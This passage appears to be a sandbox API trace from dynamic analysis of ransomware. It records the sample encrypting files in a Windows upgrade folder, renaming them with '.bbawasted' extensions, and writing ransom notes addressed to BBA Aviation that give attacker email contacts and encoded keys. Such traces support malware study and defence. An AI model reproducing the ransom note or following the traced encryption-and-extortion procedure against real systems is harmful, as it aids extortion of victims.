hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0234.099] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0234.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0234.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.109] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]UTTdg9kAlzBvEaM0j0EGwN8DftLPmsXtOYrgCphLRY26EwKhsXikftN6EeqU575h\r\nUPdYt0Xip4eBgcJBuiII9siXtgQpOtrv5PBMrmd+seAHmtnDXwWLXg3qBkG6K1Pu\r\nrzVpjQNdjJV7qHhbIjn5HLJIiLpwR4B/G8po+uJHHg6/IR2UxQVnEPgIU8g3Bpw5\r\nz7PMJ5h7vwh35uRGTuSdYefuODWeigDo44Klp29OERQVXlbGj/qfg4AOK/Fth0h4\r\n4McgvwVDVsBphIHKVwxX2PUrPGTSUYyWUNb4vx9O7bgs7JGx8qMwHK0oX0ILNRpS\r\nhqLx16R/sCfj7E09Fi0Vn9r9vr86yRSuIn6y73gnzCl3im6kCGeH8d25tNZmAIWh\r\n3KiXPB5beBFFWQim1tT5NfUAKF5/xaOHBU0qKErc6ttQkogSr4eG7nh8+Ife+eX3\r\nPF95dtvUP0ecLefVYnkoAQkYjdTg2mA1zrjNDrmMsBVHMnAxXcX7bljpC6RrrjyG\r\nkcykO6ig6mXoHleop0ejY0yjH5oEn6yemW4EYEWCtPMXU7IwQP61m03ALn3xw8MZ\r\nH8ZYf6AmyIynejbVql4fg6LFGQojWBUu2VZeRNpwRDkb6g0ZmOFQiBkEF71ux+XQ\r\nCHZPTZYAG523gJ22ILglx3grYSVxf1WyJptXjqTjlsf=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.109] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0234.109] SetEndOfFile (hFile=0x27c) returned 1 [0234.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.112] CloseHandle (hObject=0x27c) returned 1 [0234.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1cd0 | out: hHeap=0x660000) returned 1 [0234.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b14b0 | out: hHeap=0x660000) returned 1 [0234.112] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0234.113] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0234.113] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0234.113] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt") returned 51 [0234.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6a17c0 [0234.113] lstrcpyW (in: lpString1=0x6a1826, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.113] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6460) returned 1 [0234.113] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.113] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0234.113] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0234.114] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.115] SetEndOfFile (hFile=0x27c) returned 1 [0234.115] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.115] lstrcpyW (in: lpString1=0x6a1826, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt.bbawasted")) returned 1 [0234.120] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwcompat.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwcompat.txt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0234.120] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0234.120] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x4071 [0234.120] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4071) returned 0x5f0000 [0234.121] CloseHandle (hObject=0x290) returned 1 [0234.186] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.187] CloseHandle (hObject=0x294) returned 1 [0234.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.187] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6bd0) returned 1 [0234.187] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.188] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0234.188] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6ac0) returned 1 [0234.188] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0234.188] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0234.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0234.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.200] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]W3zOPsXujjkO7RcXu100jMvdXoQ0Q0sWusTSYZKhxDwhuXR6uuXO5gWvygLCxAGE\r\npSrR5HG9BBOes8/tkG5nfRNRfmOCsjj9Xb2R5KydYacmdiOVTUuo8DN7iy3PvIzE\r\nYIQPaH1HIQsC9D1ZrQHl9rNB0ZODXwKblPWl8JyW+iskL6lVIVqflOUnN95yFSWo\r\nKQ75jSXUQFvmbOlNrt4bexQBlumqj3FhH2dikOCbwxsSCT/ezKi9Czel3iNGQG24\r\nEaOnVBF2bj3w0XeAGuhcEXhmJUu+eRovaTHXDHcc6L9kmlEZ6bs3Tei6mJYPdZ6p\r\njrpcSk8w4ozlvpzWDSvwy2wNewqY+JrbSlM5lz/5+YOAG7A03OGwTFbrA9u/1oEw\r\n82AYxKkvVMJbKs0OLRuxK2lsygmpDIS/Gx5MoDICtxzx69BzQoAKBaMK6LgRYA4U\r\nE+IrPPpJNCOo7OXNZOtO/hbDtSjzjPNi9mpkQ3TNgj+Twllnpv3gajIawN60e47u\r\n8QzndikPIp44bQ56Hyo8dvh0BlwCv0O75dfHoaJWNlcXt+ruchv+BA2bR9FKKcjm\r\nEEZauEP+uyCDe3waBAPN14CpLrspP2uG7sc2nJVLrOtq3364aw/P8hHDHALIoFzF\r\nctYGsD1plj6iHAc3KZKvCl0n0ICQRwu+rRuMO9BT7Wl=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.200] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0234.201] SetEndOfFile (hFile=0x27c) returned 1 [0234.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.203] CloseHandle (hObject=0x27c) returned 1 [0234.203] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a17c0 | out: hHeap=0x660000) returned 1 [0234.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1270 | out: hHeap=0x660000) returned 1 [0234.204] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6680) returned 1 [0234.205] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0234.205] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0234.205] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt") returned 52 [0234.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6ad900 [0234.205] lstrcpyW (in: lpString1=0x6ad968, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.205] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6ce0) returned 1 [0234.206] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.206] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0234.206] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0234.206] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.208] SetEndOfFile (hFile=0x27c) returned 1 [0234.208] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.208] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.208] lstrcpyW (in: lpString1=0x6ad968, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt.bbawasted")) returned 1 [0234.209] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\hwexclude.txt.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\hwexclude.txt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0234.209] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0234.210] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x8d7 [0234.210] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8d7) returned 0x5f0000 [0234.210] CloseHandle (hObject=0x294) returned 1 [0234.235] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.235] CloseHandle (hObject=0x290) returned 1 [0234.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb80 [0234.235] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6bd0) returned 1 [0234.236] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x6adbc8 | out: pbBuffer=0x6adbc8) returned 1 [0234.236] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0234.236] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6570) returned 1 [0234.237] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0234.237] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0234.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb80 | out: hHeap=0x660000) returned 1 [0234.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.309] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eJDJebRwEuKBsOgZFMXEeJIkoxmnFu0YziS6TWERrcDVBFuR/2S0hn4PRIofNw1j\r\nowAHdYifcyzKi6/xfX0XjzMwpWbyFek2t5MWAzuBYt+bihvZtzTG8qyO+yWAITAD\r\n7vq1qdEF00yvaXya4F0B2nCBPTg+8Z2smxUOk+oCy7s14EE7gsvyKL0A8odvDmZn\r\n2eKfaHQT2qmZqEw9gaZ1sI1ENiOSlJqneCEhwE3Ht2NjyM0spxgWwg/FxFo5wNeb\r\n5TM3cLxJ9RRYSCwYDkwE6ZqiGO7H6xn5HPb3VTP1R60uxqqpQ/aUDPqKybIEGmQc\r\nJVHJP5Dfe6AyPuWPrFv8YZgFPCOyoSkJtoDBfbH1giNarCnP6BZTiZ7T6+UecgUt\r\nfjppOwCVABAvu+5AvDijBCQtctJWTLqCdZA7LmV5XK8NHil35+PFyMVEVTuEaIhb\r\nBSLhNk7AP/pib0uBP+M27wY3V+Alq4KbNDWphE4aiHr5ei2U8JzB5RAuk38fuC6c\r\nRFPWNmKjE+9BxJl1rhc/fswWXo6sPj55H6+ThtXxFiDQJ0XP2Pc0J0aS2qua/x9R\r\nogECTKrkOmpFBsPBV60bkFHi8UhAA7Q4O/EKvfEZvmp+sRRZac41rxtr6jQiJxHn\r\nVYaM7CDyUv6/TnMewN6joX/tjyJrr0R3P29LXIYJZFo=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0234.310] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0234.310] SetEndOfFile (hFile=0x27c) returned 1 [0234.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.313] CloseHandle (hObject=0x27c) returned 1 [0234.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7dd8 | out: hHeap=0x660000) returned 1 [0234.314] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0234.314] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0234.314] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0234.315] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf") returned 50 [0234.315] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6a17c0 [0234.315] lstrcpyW (in: lpString1=0x6a1824, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.315] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.315] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6240) returned 1 [0234.316] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.316] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0234.316] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0234.316] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.318] SetEndOfFile (hFile=0x27c) returned 1 [0234.318] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.318] lstrcpyW (in: lpString1=0x6a1824, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf.bbawasted")) returned 1 [0234.319] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.inf.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.inf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0234.319] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0234.320] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x5d7 [0234.320] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5d7) returned 0x5f0000 [0234.320] CloseHandle (hObject=0x280) returned 1 [0234.322] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.322] CloseHandle (hObject=0x28c) returned 1 [0234.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0234.322] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0234.323] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0234.323] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0234.323] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6d68) returned 1 [0234.324] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0234.324] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0234.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0234.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0234.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.334] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lNZfRygeyfKaJHXr91zdVWjunqkMObdsWJXQRStzkN4ZbEJx0h5HXkxx5rkP4xgh\r\nFcnyNdDvljf6pZHHmrEoONNAC/2p7Z1Yxu4CQo6o3CaxH0E6snyV8YDMuuo0As2P\r\n51Y5gsCI1YfH4ImtW0mUR+zaQmX1I2WjkLRccIWQKyGlRZMBJv22eOQePWFlAkch\r\nXBCmZopxKztpltuN3tuqy5Mefx8VUbUSbMI2CI0IKZ9Et0S3wM3AbgyHTHr6mKU/\r\nlNrM3jRIzon64izQCGxAQ/lKZoRKx6Bl43eIsXGCXpfr0oVJquBAGFCxFWJAnC0K\r\nbZnUy/TlnWS763jN12fl04SPltIHHRYnzB6zA6frY8eDEFsJXL/0gS1PEvoR2r2G\r\n7aKCl1fDqNdsEbhvXtP+vsg6w5UE+Nr0j7UeHxcbMt5uNBLIOfqEiBwTDlH4gxSr\r\nqgg1aJKD5rtBr0TMtBbarE7XOhn+l6H2w1E28MB5cnqMBEvQU98WqwpgukyjgH9B\r\nyjPJotnIR/qV4s9HrrDnmIdkJB7OfCLe8M2n+dHErOkOiRs7kxymSlY0SAaIX+oN\r\nIb9hrjGppTXaAIwudNtdRzkrnpgmffYYTVuYMPgUCycs/NcLJdBHeyzZAgegR3ER\r\nvSieoCmE8cJYpR1rvk4/dyiLJ/0zo/iMHXsfdVjYJIH=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0234.335] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0234.335] SetEndOfFile (hFile=0x27c) 